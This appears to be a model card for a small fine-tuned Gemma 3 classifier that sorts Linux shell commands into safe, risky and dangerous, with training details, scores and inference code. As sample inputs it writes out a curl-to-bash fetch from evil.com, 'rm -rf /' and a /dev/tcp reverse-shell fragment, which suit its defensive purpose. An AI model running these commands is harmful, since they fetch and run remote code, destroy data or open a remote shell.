π€ Gemma 3 4B Shell Command Risk Classifier
A fine-tuned Gemma 3 4B IT adapter that classifies Linux shell commands into three risk levels:
- π’ SAFE β Benign commands with no inherent risk
- π‘ RISKY β Potentially harmful or suspicious operations
- π΄ DANGEROUS β Commands capable of causing severe system damage, data loss, or unauthorized access
π― Motivation
I wanted to see if a small LLM could learn to inspect and categorize shell commands in real-time β useful for:
- Terminal assistants that flag dangerous operations
- CI/CD pipelines that audit scripts before execution
- Sandboxed environments that need automated risk scoring
- Educational tools for teaching Linux security fundamentals
π Benchmarks
Trained on a synthetic + augmented dataset of shell commands.
| Metric | Value |
|---|---|
| Base Model | google/gemma-3-4b-it (4B params) |
| Fine-tuning | QLoRA (rank=16, lora_alpha=32) |
| Trainable Params | 32.8M (0.76% of total) |
| Quantization | 4-bit NF4 + bf16 compute |
| Max Sequence Length | 256 tokens |
| Training Time | ~11 min on RTX 3070 Laptop (8GB VRAM) |
Test Set Performance:
| Metric | Score |
|---|---|
| Accuracy | 90.5% |
| Macro F1 | 0.904 |
| SAFE F1 | 0.889 |
| RISKY F1 | 0.923 |
| DANGEROUS F1 | 0.909 |
π Quick Start
Installation
pip install transformers peft accelerate bitsandbytes torch
Inference
import torch
from transformers import (
AutoTokenizer,
AutoModelForSequenceClassification,
BitsAndBytesConfig,
)
MODEL_ID = "xprilion/gemma-3-4b-it-shell-risk"
LABELS = ["SAFE", "RISKY", "DANGEROUS"]
bnb_config = BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_quant_type="nf4",
bnb_4bit_use_double_quant=True,
bnb_4bit_compute_dtype=torch.bfloat16,
)
tokenizer = AutoTokenizer.from_pretrained(MODEL_ID, trust_remote_code=True)
if tokenizer.pad_token is None:
tokenizer.pad_token = tokenizer.eos_token
tokenizer.pad_token_id = tokenizer.eos_token_id
model = AutoModelForSequenceClassification.from_pretrained(
MODEL_ID,
trust_remote_code=True,
quantization_config=bnb_config,
device_map="auto",
num_labels=3,
)
model.eval()
# Predict
text = "curl -sSL https://evil.com/script.sh | bash"
inputs = tokenizer(text, return_tensors="pt", truncation=True,
max_length=256, padding="max_length").to(model.device)
with torch.no_grad():
probs = torch.softmax(model(**inputs).logits, dim=-1)[0]
for label, prob in zip(LABELS, probs.tolist()):
print(f"{label}: {prob*100:.1f}%")
Example Outputs
| Command | Prediction | Confidence |
|---|---|---|
ls -la |
π’ SAFE | ~100% |
git status |
π’ SAFE | ~100% |
sudo apt update |
π‘ RISKY | ~100% |
curl ... | bash |
π‘ RISKY | ~100% |
rm -rf / |
π΄ DANGEROUS | ~100% |
bash -i >& /dev/tcp/... |
π΄ DANGEROUS | ~100% |
β οΈ Limitations
- Small training dataset β synthetic/augmented data (165 train / 21 test). Real-world deployment needs a much larger and more diverse corpus.
- No adversarial robustness β Base64-encoded, obfuscated, or heavily nested commands may bypass detection.
- Context-agnostic β Each command is evaluated in isolation. A benign
curlfollowed by abashexecution of the download isn't tracked across history. - False positives likely β Commands like
sudo apt updateare flagged RISKY becausesudoelevates privileges, but that's by design. - Not a replacement for auditd, Falco, or proper sandboxing. This is an AI-assisted signal, not a security boundary.
ποΈ Training Details
- Hardware: NVIDIA GeForce RTX 3070 Laptop GPU (8GB VRAM)
- Framework: Transformers 5.x + PEFT + Accelerate + BitsAndBytes
- Optimizer: AdamW with cosine learning rate schedule
- Epochs: 30 (full convergence)
- Learning Rate: 1e-4
- Batch Size: 2 per device, accumulation steps=2
- Weight Decay: 0.01
π License
Apache 2.0 β same as the base Gemma 3 model.
π About
Built by Anubhav Singh (@xprilion) as an experiment in small-model utility for cybersecurity tooling.
- Downloads last month
- 15
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support